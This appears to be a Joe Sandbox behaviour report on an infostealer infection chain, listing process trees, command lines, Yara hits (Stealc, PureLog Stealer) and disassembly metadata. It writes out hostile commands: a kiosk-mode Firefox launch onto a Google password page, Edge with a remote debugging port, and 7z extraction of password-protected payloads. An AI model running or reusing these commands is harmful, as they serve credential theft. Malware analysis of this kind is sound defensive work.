
Show Windows behavior

Target ID:	25
Start time:	04:10:35
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2080,i,17300030453258231598,16227378624072536825,262144 /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	04:10:37
Start date:	19/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	04:10:37
Start date:	19/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	04:10:37
Start date:	19/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	04:10:38
Start date:	19/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2252 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca8f1ef1-5ad9-4ea6-a4b3-1032a2574296} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4b686d710 socket
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	04:10:39
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe"
Imagebase:	0x3f0000
File size:	1'716'736 bytes
MD5 hash:	C6E7C724DD8F29F45E6686E0ADD2AD81
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	04:10:42
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe"
Imagebase:	0x5d0000
File size:	2'928'640 bytes
MD5 hash:	5081EA72759BA0DEA91A56403FF62DC6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.3764438263.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000002.3755390540.00000000005D1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001F.00000003.3202576047.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	04:10:44
Start date:	19/12/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1376 -parentBuildID 20230927232528 -prefsHandle 4416 -prefMapHandle 4412 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {36bd7abb-261f-4d61-be3b-96cf981c68b9} 380 "\\.\pipe\gecko-crash-server-pipe.380" 1f4c7527410 rdd
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	04:10:46
Start date:	19/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	04:10:47
Start date:	19/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2044,i,13123127802507167736,11492811734729124769,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	04:10:47
Start date:	19/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	04:10:48
Start date:	19/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2008,i,6347898806173620045,4158636205428793632,262144 /prefetch:3
Imagebase:	0x7ff715da0000
File size:	4'210'216 bytes
MD5 hash:	BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	04:10:51
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe"
Imagebase:	0xbf0000
File size:	967'680 bytes
MD5 hash:	629A3EAF01FB818CD0B1964E454BA39B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	38
Start time:	04:10:51
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe"
Imagebase:	0x400000
File size:	4'438'776 bytes
MD5 hash:	3A425626CBD40345F5B8DDDD6B2B9EFA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 88%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	39
Start time:	04:10:55
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM firefox.exe /T
Imagebase:	0xab0000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	04:10:55
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	04:10:58
Start date:	19/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff69cd80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	42
Start time:	04:10:58
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	04:10:58
Start date:	19/12/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff66e660000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	04:10:59
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p24291711423417250691697322505 -oextracted
Imagebase:	0x960000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	04:10:59
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_7.zip -oextracted
Imagebase:	0x960000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	04:10:59
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe"
Imagebase:	0x3f0000
File size:	1'716'736 bytes
MD5 hash:	C6E7C724DD8F29F45E6686E0ADD2AD81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	04:10:59
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_6.zip -oextracted
Imagebase:	0x960000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	04:11:01
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_5.zip -oextracted
Imagebase:	0x960000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	04:11:02
Start date:	19/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe"
Imagebase:	0xe60000
File size:	3'286'016 bytes
MD5 hash:	C00A67D527EF38DC6F49D0AD7F13B393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000031.00000002.3396644733.0000000004479000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000031.00000000.3376964125.0000000000E62000.00000002.00000001.01000000.0000001D.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 54%, ReversingLabs
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	758
Total number of Limit Nodes:	13

Executed Functions

Function 00ED652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00ED652A,?,?,?,?,?,00ED7661), ref: 00ED6566

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f4021cf476d3a86930e8b6ac41ac0167b8b4b06555efa8a035af177d4d539b49
Instruction ID: 66357adb39c043349fd0341fef1692e42ba905d1d8a737175bcc2a06d44396cd
Opcode Fuzzy Hash: f4021cf476d3a86930e8b6ac41ac0167b8b4b06555efa8a035af177d4d539b49
Instruction Fuzzy Hash: BFE08C31041108BECE257F59EC1AA4C3BAAEB0174DF00A811FC046A321CB26EE83D680

Function 04CD01A1 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2177106342.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4cd0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a32b59629c2505dffb66af6018d0273aa89dd1133f3c0456ed91e5a6e9d8a6f
Instruction ID: 12cd5f43f0e15e14e9c30e6c8a02e41e05d81c45e6663bb8af3ad7dbb1a88188
Opcode Fuzzy Hash: 1a32b59629c2505dffb66af6018d0273aa89dd1133f3c0456ed91e5a6e9d8a6f
Instruction Fuzzy Hash: DE118BEB28D124BDB142998B2F18AFB6A6FE2D2334B34802BF506D1506F3E45A0D3171

Function 00EA5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00EA60FA
00000419, xrefs: 00EA6098
Keyboard Layout\Preload, xrefs: 00EA6054
00000422, xrefs: 00EA60C9
0000043f, xrefs: 00EA612B

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 572bd4163ea7dbee113a83ba9486348edab452be31af38eab120a7955d540f51
Instruction ID: eb0c1b0c2a79d026c42cb898edee47fb626868a80bc1e4162b93f7922fb83dd1
Opcode Fuzzy Hash: 572bd4163ea7dbee113a83ba9486348edab452be31af38eab120a7955d540f51
Instruction Fuzzy Hash: 3AF1D271A0024C9BEB24DF54CC85BEEBBB9EF45304F5045A9F508BB281DB75AA84CF91

Function 00EA9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
